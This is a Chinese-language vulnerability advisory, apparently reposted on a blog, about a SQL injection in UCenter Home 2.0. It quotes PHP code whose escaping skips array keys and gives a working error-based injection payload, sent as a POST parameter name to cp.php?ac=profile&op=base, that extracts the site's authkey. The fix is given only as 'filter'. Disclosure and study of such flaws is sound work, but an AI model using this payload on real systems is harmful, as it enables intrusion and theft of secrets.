UCenter Home 2.0 鸡叻 SQL 注入及修复

发布日期:2011-01.23
发布作者:alibaba

影响版本:UCenter Home 2.0
官方网站:http://www.discuz.net

漏洞类型:SQL注入
漏洞描述:uc_home 2.0 在magic_quote_gpc off 的环境下只对参数值进行过滤,忽略了参数名导致注入产生。

代码分析:

function_common.php //SQL ADDSLASHES function saddslashes($string) { if(is_array($string)) { foreach($string as $key => $val) { $string[$key] = saddslashes($val); //只过滤参数值 } } else { $string = addslashes($string); } return $string; }
cp_profile.php 大约56行

//隐私 $inserts = array(); foreach ($_POST[friend] as $key => $value) { value = intval($value); $inserts[] = "(base,$key,$space[uid],$value)"; //$key 未没过滤 } if($inserts) { $_SGLOBAL[db]->query("DELETE FROM ".tname(spaceinfo)." WHERE uid=$space[uid] AND type=base"); $_SGLOBAL[db]->query("INSERT INTO ".tname(spaceinfo)." (type,subtype,uid,friend) VALUES ".implode(,, $inserts)); //这里出现注入漏洞 }
Exploit:

要求: magic_quote_gpc off
URL: cp.php?ac=profile&op=base

保存时创建一个POST,参数名为:
friend[a,(select 1 from(select count(*),concat((Select concat(substring(authkey,1,64)) FROM uc_applications limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a),1)#]
参数值: 随意

这里我使用火狐的tamper实时添加POST

UCenter Home 2.0 鸡叻 SQL 注入及修复

得到 uchome的 authkey

UCenter Home 2.0 鸡叻 SQL 注入及修复

修复:过滤

分类:默认分类 时间:2015-02-27 人气:6
本文关键词:
分享到:

相关文章

Copyright (C) quwantang.com, All Rights Reserved.

趣玩堂 版权所有 京ICP备15002868号

processed in 0.125 (s). 10 q(s)